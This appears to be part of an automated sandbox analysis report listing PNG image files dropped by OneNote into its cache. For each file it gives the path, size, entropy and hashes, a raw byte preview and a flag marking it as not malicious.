SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003Q.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003R.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003S.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003T.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003U.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003V.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000040.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000041.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000042.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000043.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000044.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000045.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000046.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000047.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
